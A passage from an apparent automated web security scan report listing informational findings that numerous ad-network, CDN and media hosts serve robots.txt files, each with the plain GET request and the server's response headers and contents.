ETag: W/"36-1307714444000"
Last-Modified: Fri, 10 Jun 2011 14:00:44 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sat, 17 Sep 2011 01:38:53 GMT
Connection: close

# go away
User-agent: *
Disallow: /

23.6. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:14:02 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


23.7. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.auditude.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 25 Jul 2011 17:10:02 GMT
Content-Length: 27
Date: Sat, 17 Sep 2011 01:10:14 GMT
Server: lighttpd/1.4.18


User-agent: *
Disallow: /

23.8. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 17 Sep 2011 00:52:00 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.9. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:52:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:52:13 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

23.10. http://adm.fwmrm.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adm.fwmrm.net
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adm.fwmrm.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "462-24-44e654b4f6340"
Expires: Sat, 24 Sep 2011 01:04:29 GMT
Cache-Control: max-age=604800
Last-Modified: Thu, 29 May 2008 21:34:29 GMT
Accept-Ranges: bytes
Content-Length: 36
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 01:04:29 GMT
Connection: close

# go away
User-Agent: *
Disallow: /

23.11. http://ads.bluelithium.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:54:07 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:54:07 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

23.12. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310680427000"
Last-Modified: Thu, 14 Jul 2011 21:53:47 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sat, 17 Sep 2011 01:44:37 GMT
Connection: close

User-agent: *
Disallow: /

23.13. http://alerts.4info.com/alert/ads/dispatcher.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: alerts.4info.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"26-1302809905000"
Last-Modified: Thu, 14 Apr 2011 19:38:25 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 26
Date: Sat, 17 Sep 2011 01:50:23 GMT
Connection: close

User-agent: *
Disallow:


23.14. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775029/8/923517/decide.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "200515ce-1a-f999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=120, max=953
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

23.15. http://api.bizographics.com/v2/profile.redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v2/profile.redirect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:17:14 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

23.16. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Mon, 17 Oct 2011 00:55:10 GMT
X-FB-Server: 10.42.22.21
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

23.17. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sat, 17 Sep 2011 01:02:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:02:48 GMT
Connection: close

User-agent: *
Disallow: /

23.18. http://as1.suitesmart.com/99917/G15493.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /99917/G15493.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e36-1a-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 00:52:11 GMT
Connection: close
Cache-Control: no-store

User-agent: *
Disallow: /

23.19. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Mon, 19 Sep 2011 01:39:39 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23.20. http://attwireless-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attwireless-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: attwireless-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1316224201000"
Last-Modified: Sat, 17 Sep 2011 01:50:01 GMT
Content-Type: text/plain
Content-Length: 216
Date: Sat, 17 Sep 2011 01:52:42 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

23.21. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Sun, 18 Sep 2011 00:54:32 GMT
Date: Sat, 17 Sep 2011 00:54:32 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400

User-agent: *
Disallow: /

23.22. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Wed, 16 Jun 2010 21:44:11 GMT
ETag: "880214-1a-4892c9f4c80c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

23.23. http://beta.abc.go.com/shows/charlies-angels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beta.abc.go.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:03 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Mon, 12 Sep 2011 23:05:12 GMT
ETag: "a80aa-a8-4acc68f265a00"
Accept-Ranges: bytes
Content-Length: 168
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rss/
Disallow: /xml/
Disallow: /json/
Disallow: /headerxml/
Disallow: /service/
Disallow: /util/
Disallow: /vp2/

User-Agent: MJ12bot
Disallow:

23.24. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bh.heraldinteractive.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:08 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
Last-Modified: Wed, 20 Oct 2010 20:58:03 GMT
Accept-Ranges: bytes
Content-Length: 570
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Robots.txt
# Modified 06/16/2006 by Bill Gaffney
# Herald Interactive Media


User-agent: msnbot
Crawl-delay: 120

User-agent: Slurp
Crawl-delay: 15

User-agent: *
Disallow: /audio
Disal
...[SNIP]...

23.25. http://bigapple.contextuads.com/fc/go2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bigapple.contextuads.com
Path:   /fc/go2.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bigapple.contextuads.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:16:52 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 03 Mar 2010 17:48:44 GMT
ETag: "e5425e-26-17ed3700"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: Googlebot
Disallow: /fc/


23.26. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bostonherald.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:28 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 20:58:03 GMT
Accept-Ranges: bytes
Content-Length: 570
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close

Robots.txt
# Modified 06/16/2006 by Bill Gaffney
# Herald Interactive Media


User-agent: msnbot
Crawl-delay: 120

User-agent: Slurp
Crawl-delay: 15

User-agent: *
Disallow: /audio
Disal
...[SNIP]...

23.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 00:58:12 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.28. http://c.betrad.com/a/n/44/546.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /a/n/44/546.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:48:59 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

23.29. http://c.brightcove.com/services/viewer/federated_f9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Thu, 08 Sep 2011 22:01:13 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: text/plain
Content-Length: 64
Date: Sat, 17 Sep 2011 01:32:35 GMT
Connection: keep-alive
Server:

User-agent: *
Disallow: /
Allow: /services/viewer/federated_f9*

23.30. http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.heraldinteractive.com
Path:   /CSS/version5.0/sections_beta.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.heraldinteractive.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
Last-Modified: Wed, 20 Oct 2010 20:58:03 GMT
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:09:15 GMT
Content-Length: 570
Connection: close

Robots.txt
# Modified 06/16/2006 by Bill Gaffney
# Herald Interactive Media


User-agent: msnbot
Crawl-delay: 120

User-agent: Slurp
Crawl-delay: 15

User-agent: *
Disallow: /audio
Disal
...[SNIP]...

23.31. http://cdn.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.abc.go.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.abc.go.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=300
Content-Type: text/plain
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Mon, 12 Sep 2011 23:23:06 GMT
Date: Sat, 17 Sep 2011 01:03:48 GMT
Last-Modified: Fri, 22 Apr 2011 20:01:15 GMT
Expires: Sat, 17 Sep 2011 01:08:48 GMT
Content-Length: 136
Connection: close

User-agent: *
Disallow: /
User-agent: msnbot-media
Allow: /vp2/
User-agent: Googlebot
Allow: /media/_global/player/*/flash/SFP_Locke.swf

23.32. http://cdn.gigya.com/JS/gigya.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /JS/gigya.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web101
Cache-Control: max-age=86400
Date: Sat, 17 Sep 2011 01:02:02 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

23.33. http://cdn.kaltura.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.kaltura.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 18 May 2011 06:35:07 GMT
ETag: "383269-23-4a38716e71cc0"
X-Me: pa-apache1
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 00:52:05 GMT
Content-Length: 35
Connection: close

User-agent: *
Disallow: /content/


23.34. http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.media.abc.com
Path:   /media/_global/player/player1.43.0/flash/SFP_Locke.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.media.abc.com

Response

HTTP/1.0 200 OK
Content-Length: 136
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 20:01:15 GMT
Accept-Ranges: bytes
ETag: "80371b9281cc1:5afd"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 23 Apr 2011 01:56:06 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=260
Date: Sat, 17 Sep 2011 01:02:42 GMT
Connection: close

User-agent: *
Disallow: /
User-agent: msnbot-media
Allow: /vp2/
User-agent: Googlebot
Allow: /media/_global/player/*/flash/SFP_Locke.swf

23.35. http://cdn.media.abc.go.com/m/images/global/generic/logo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.media.abc.go.com
Path:   /m/images/global/generic/logo.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.media.abc.go.com

Response

HTTP/1.0 200 OK
Content-Length: 136
Content-Type: text/plain
Last-Modified: Fri, 22 Apr 2011 20:01:15 GMT
Accept-Ranges: bytes
ETag: "80371b9281cc1:5afd"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 23 Apr 2011 01:56:06 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=285
Date: Sat, 17 Sep 2011 01:02:17 GMT
Connection: close

User-agent: *
Disallow: /
User-agent: msnbot-media
Allow: /vp2/
User-agent: Googlebot
Allow: /media/_global/player/*/flash/SFP_Locke.swf

23.36. http://cdn.optmd.com/V2/80181/197812/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197812/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "bed164-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 01:02:48 GMT
Connection: close

User-agent: *
Disallow: /

23.37. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sat, 17 Sep 2011 00:52:01 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.38. http://cdnbakmi.kaltura.com/p/591531/sp/59153100/flash/kdp3/v3.5.17.6/kdp3.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdnbakmi.kaltura.com
Path:   /p/591531/sp/59153100/flash/kdp3/v3.5.17.6/kdp3.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdnbakmi.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 18 May 2011 06:35:07 GMT
ETag: "383269-23-4a38716e71cc0"
X-Me: pa-apache1
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=UTF-8
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 35
Connection: close

User-agent: *
Disallow: /content/


23.39. http://cheetah.vizu.com/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheetah.vizu.com
Path:   /a.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cheetah.vizu.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:57 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n53 ( lax-agg-n48), ht-d lax-agg-n48.panthercdn.com
ETag: "3c053-1a-88395bc0"
Cache-Control: max-age=604800
Expires: Wed, 21 Sep 2011 15:58:06 GMT
Age: 205071
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Fri, 02 Sep 2011 00:35:03 GMT
Connection: close

User-agent: *
Disallow: /

23.40. http://cim.meebo.com/cim  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cim

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:57 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/

23.41. http://clk.atdmt.com/go/335787632/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/335787632/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:38:36 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

23.42. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:30:57 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

23.43. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /EF949BBC-E1FB-11DF-83A0-DE09EDADD848

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.pulse360.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:15:25 GMT
Server: Barista/1.1
Connection: Close
Content-Type: text/plain; charset=utf-8
Content-Length: 35
Last-Modified: Wed, 14 Sep 2011 14:26:58 GMT

User-agent: *
Disallow: /cgi-bin/


23.44. http://d14.zedo.com/ads6/d/3853/172/951/0/2/i.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d14.zedo.com
Path:   /ads6/d/3853/172/951/0/2/i.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d14.zedo.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:10:21 GMT
ETag: "1b42681-4c-456973d386880"
Last-Modified: Thu, 11 Sep 2008 04:31:14 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

23.45. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sat, 17 Sep 2011 01:11:56 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

23.46. http://dp.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /ps/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dp.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:48 GMT
Server: Apache
Last-Modified: Fri, 22 Jul 2011 00:03:04 GMT
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /


23.47. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 01:09:56 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

23.48. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

